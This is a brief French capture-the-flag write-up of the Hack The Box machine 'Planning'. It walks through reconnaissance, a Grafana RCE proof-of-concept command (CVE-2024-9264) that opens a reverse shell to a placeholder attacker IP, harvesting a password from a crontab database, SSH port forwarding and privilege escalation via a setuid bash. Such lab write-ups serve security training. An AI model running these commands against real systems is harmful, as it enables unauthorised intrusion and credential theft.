Bienvenue sur ce nouveau writeup. Aujourd’hui, on s’attaque à la machine Planning sur Hack The Box. Une machine fraîchement sortie dans l’arène publique.
nmap -sCV [IP] --min-rate 9600 -p- -T5 -vv
Ports ouverts :
Nom d’hôte découvert : planning.htb (à ajouter dans /etc/hosts)
Pas d’élément exploitable évident. On passe à la recherche de sous-domaines avec les wordlists Bitquark de SecLists.
Un sous-domaine intéressant est découvert et ajouté à /etc/hosts.
Version détectée : Grafana v11.0.0
Exploit public trouvé :
CVE-2024-9264 - RCE Grafanapython3 poc.py --url http://grafana.planning.htb --username [USER] --password [PASS] --reverse-ip [ATTACKER] --reverse-port [PORT]
Utilisation de linpeas pour l’énumération locale :
Connexion SSH avec l’utilisateur enzo :
ssh enzo@planning.htb
Lecture du fichier /etc/crontabs/crontab.db pour récupérer un mot de passe.
Redirection de port :
ssh -L 8000:localhost:8000 enzo@planning.htb
Accès à l’interface web sur http://localhost:8000 pour créer une tâche :
Retour dans la session SSH :
/bin/bash -p
Machine compromise avec succès. Une belle démonstration d’exploitation d’un service exposé (Grafana) et d’une élévation via cron web UI.
Thanks, Artemis Community 🛡️